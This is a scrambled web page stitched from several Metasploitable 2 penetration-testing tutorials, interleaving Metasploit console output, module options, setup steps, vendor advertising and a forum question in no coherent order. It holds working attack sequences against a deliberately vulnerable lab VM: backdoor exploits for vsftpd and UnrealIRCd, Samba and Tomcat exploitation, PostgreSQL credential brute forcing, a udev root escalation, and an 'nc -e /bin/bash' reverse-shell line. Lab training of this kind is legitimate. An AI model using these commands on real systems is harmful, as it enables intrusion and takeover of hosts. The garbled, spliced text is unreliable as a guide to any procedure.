metasploitable 2 list of vulnerabilities

This can be done via brute forcing, SQL injection and XSS via referer HTTP headerSQL injection and XSS via user-agent string, Authentication bypass SQL injection via the username field and password fieldSQL injection via the username field and password fieldXSS via username fieldJavaScript validation bypass, This page gives away the PHP server configurationApplication path disclosurePlatform path disclosure, Creates cookies but does not make them HTML only. It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. [*] Writing to socket A 15. Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). msf exploit(udev_netlink) > show options SRVHOST 0.0.0.0 yes The local host to listen on. Step 8: Display all the user tables in information_schema. Totals: 2 Items. ---- --------------- -------- ----------- Type help; or \h for help. To download Metasploitable 2, visitthe following link. We can now look into the databases and get whatever data we may like. [*] Command: echo f8rjvIDZRdKBtu0F; root, msf > use auxiliary/scanner/postgres/postgres_login The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. In Part 1 of this article we covered some examples of Service vulnerabilities, Server backdoors, and Web Application vulnerabilities. Associated Malware: FINSPY, LATENTBOT, Dridex. [*] Accepted the first client connection Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. Highlighted in red underline is the version of Metasploit. [*] Scanned 1 of 1 hosts (100% complete) msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true msf exploit(twiki_history) > show options RPORT 5432 yes The target port A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. Module options (exploit/linux/misc/drb_remote_codeexec): Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Metasploitable is a Linux virtual machine that is intentionally vulnerable. [*] B: "f8rjvIDZRdKBtu0F\r\n" RHOST yes The target address RHOST => 192.168.127.154 Its GUI has three distinct areas: Targets, Console, and Modules. Proxies no Use a proxy chain METASPLOIT On-Prem Vulnerability Management NEXPOSE Digital Forensics and Incident Response (DFIR) Velociraptor Cloud Risk Complete Cloud Security with Unlimited Vulnerability Management Explore Offer Managed Threat Complete MDR with Unlimited Risk Coverage Explore offer Services MANAGED SERVICES Detection and Response Do you have any feedback on the above examples? USERNAME => tomcat Access To access the vulnerable application, point your browser on Metasploitable3 to http://localhost:8282/struts2-rest-showcase To access the Apache Tomcat Manager, point your browser on Metasploitable3 to http://localhost:8282. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. Server version: 5.0.51a-3ubuntu5 (Ubuntu). However the .rhosts file is misconfigured. ---- --------------- -------- ----------- After the virtual machine boots, login to console with username msfadmin and password msfadmin. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. To access the web applications, open a web browser and enter the URL http:// where is the IP address of Metasploitable 2. RPORT 1099 yes The target port 0 Automatic Target rapid7/metasploitable3 Wiki. ---- --------------- -------- ----------- A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. [*] B: "7Kx3j4QvoI7LOU5z\r\n" By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. In the next section, we will walk through some of these vectors. SMBUser no The username to authenticate as ---- --------------- -------- ----------- We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password. The main purpose of this vulnerable application is network testing. msf exploit(distcc_exec) > set RHOST 192.168.127.154 Metasploitable is installed, msfadmin is user and password. Perform a ping of IP address 127.0.0.1 three times. PASSWORD => tomcat Metasploit is a free open-source tool for developing and executing exploit code. [*] Successfully sent exploit request Welcome to the MySQL monitor. Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. Name Current Setting Required Description You will need the rpcbind and nfs-common Ubuntu packages to follow along. [*] Reading from sockets RPORT 21 yes The target port Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. RHOSTS => 192.168.127.154 [*] Started reverse double handler To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. RHOST 192.168.127.154 yes The target address To have over a dozen vulnerabilities at the level of high on severity means you are on an . [*] Accepted the second client connection RHOST => 192.168.127.154 [+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres' Name Disclosure Date Rank Description Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. URI yes The dRuby URI of the target host (druby://host:port) The default login and password is msfadmin:msfadmin. msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159 Between November 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz archive. 0 Automatic Target STOP_ON_SUCCESS => true In Metasploit, an exploit is available for the vsftpd version. This VM could be used to perform security training, evaluate security methods, and practice standard techniques for penetration testing. Id Name Metasploitable 3 is a build-it-on-your-own-system operating system. 17,011. Lets move on. The nmap command uses a few flags to conduct the initial scan. Telnet is a program that is used to develop a connection between two machines. PASSWORD no A specific password to authenticate with You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other. The root directory is shared. Setting the Security Level from 0 (completely insecure) through to 5 (secure). Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target. [*] USER: 331 Please specify the password. Id Name Select Metasploitable VM as a target victim from this list. [*] Writing to socket A TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). Backdoors - A few programs and services have been backdoored. It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. Using Exploits. Step 3: Always True Scenario. RPORT => 8180 Module options (exploit/unix/webapp/twiki_history): =================== Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for. The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide. To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan. [*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR Payload options (cmd/unix/reverse): Lets see what that implies first: TCP Wrapper is a host-based network access control system that is used in operating systems such as Linux or BSD for filtering network access to Internet Protocol (IP) servers. 0 Automatic Metasploitable Networking: Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Name Current Setting Required Description These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. . [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2021-02-06 22:23:23 +0300 now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. whoami Please check out the Pentesting Lab section within our Part 1 article for further details on the setup. When we try to netcatto a port, we will see this: (UNKNOWN) [192.168.127.154] 514 (shell) open. We did an aggressive full port scan against the target. The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. This set of articles discusses the RED TEAM's tools and routes of attack. Cross site scripting via the HTTP_USER_AGENT HTTP header. [*] Reading from sockets Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. URI => druby://192.168.127.154:8787 [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2021-02-06 16:51:56 +0300 msf exploit(java_rmi_server) > show options echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. Same as login.php. Back on the Login page try entering the following SQL Injection code with a trailing space into the Name field: The Login should now work successfully without having to input a password! To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Id Name It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. LHOST => 192.168.127.159 Step 9: Display all the columns fields in the . If so please share your comments below. Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application. Name Current Setting Required Description Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. payload => linux/x86/meterpreter/reverse_tcp RHOST yes The target address To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. msf auxiliary(postgres_login) > show options 0 Automatic However, the exact version of Samba that is running on those ports is unknown. We are interested in the Victim-Pi or 192.168.1.95 address because that is a Raspberry Pi and the target of our attack.. Our attacking machine is the kali-server or 192.168.1.207 Raspberry Pi. Module options (exploit/linux/local/udev_netlink): In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. Step 7: Display all tables in information_schema. A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. Step 2: Vulnerability Assessment. msf > use exploit/multi/misc/java_rmi_server Browsing to http://192.168.56.101/ shows the web application home page. The vulnerability present in samba 3.x - 4.x has several vulnerabilities that can be exploited by using Metasploit module metasploit module: exploit/multi/samba/usermap_script set RHOST- your Remote machine IP then exploit finally you got a root access of remote machine. TIMEOUT 30 yes Timeout for the Telnet probe So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. RHOSTS yes The target address range or CIDR identifier [*] Command: echo 7Kx3j4QvoI7LOU5z; USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line DATABASE template1 yes The database to authenticate against VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp Name Current Setting Required Description For network clients, it acknowledges and runs compilation tasks. The first of which installed on Metasploitable2 is distccd. For a more up-to-date version visit: This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. Andrea Fortuna. According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. SMBPass no The Password for the specified username Long list the files with attributes in the local folder. The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. The interface looks like a Linux command-line shell. 22. [*] Writing to socket A msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154 In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. A test environment provides a secure place to perform penetration testing and security research. Same as credits.php. There was however an error generated though this did not stop the ability to run commands on the server including ls -la above and more: Whilst we can consider this a success, repeating the exploit a few times resulted in the original error returned. Step 5: Select your Virtual Machine and click the Setting button. Here are the outcomes. Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). Metasploitable 2 is available at: . -- ---- DB_ALL_PASS false no Add all passwords in the current database to the list [*] Found shell. Metasploitable 3 is the updated version based on Windows Server 2008. [*] Accepted the first client connection [*] Connected to 192.168.127.154:6667 To build a new virtual machine, open VirtualBox and click the New button. You can edit any TWiki page. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. [*], msf > use exploit/multi/http/tomcat_mgr_deploy [*] A is input 0 Generic (Java Payload) This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host Use TWiki to run a project development space, a document management system, a knowledge base or any other groupware tool on either on an intranet or on the Internet. [*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //192.168.99.131/tmp, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. 0 Automatic Id Name [*] Command: echo ZeiYbclsufvu4LGM; So we got a low-privilege account. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 The next service we should look at is the Network File System (NFS). Redirect the results of the uname -r command into file uname.txt. Id Name [*] Attempting to automatically select a target [*] instance eval failed, trying to exploit syscall msf auxiliary(smb_version) > show options msf exploit(java_rmi_server) > set RHOST 192.168.127.154 Metasploitable 2 has deliberately vulnerable web applications pre-installed. Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! You can connect to a remote MySQL database server using an account that is not password-protected. -- ---- [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) RETURN_ROWSET true no Set to true to see query result sets In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. [*] A is input Step 6: Display Database Name. USERNAME postgres no A specific username to authenticate as So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. Id Name Alternatively, you can also use VMWare Workstation or VMWare Server. From the results, we can see the open ports 139 and 445. [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script Time for some escalation of local privilege. [*] Transmitting intermediate stager for over-sized stage(100 bytes) Name Current Setting Required Description On July 3, 2011, this backdoor was eliminated. Thus, this list should contain all Metasploit exploits that can be used against Linux based systems. Module options (exploit/multi/samba/usermap_script): Exploit target: msf exploit(tomcat_mgr_deploy) > exploit ---- --------------- -------- ----------- The Metasploit Framework is the most commonly-used framework for hackers worldwide. Have you used Metasploitable to practice Penetration Testing? [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) [*] Writing to socket B We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. During that test we found a number of potential attack vectors on our Metasploitable 2 VM. After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. For your test environment, you need a Metasploit instance that can access a vulnerable target. [*] Started reverse double handler These backdoors can be used to gain access to the OS. SRVHOST 0.0.0.0 yes The local host to listen on. ---- --------------- ---- ----------- URIPATH no The URI to use for this exploit (default is random) Step 2: Basic Injection. msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat ---- --------------- -------- ----------- [*] Reading from sockets URIPATH no The URI to use for this exploit (default is random) This will provide us with a system to attack legally. First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search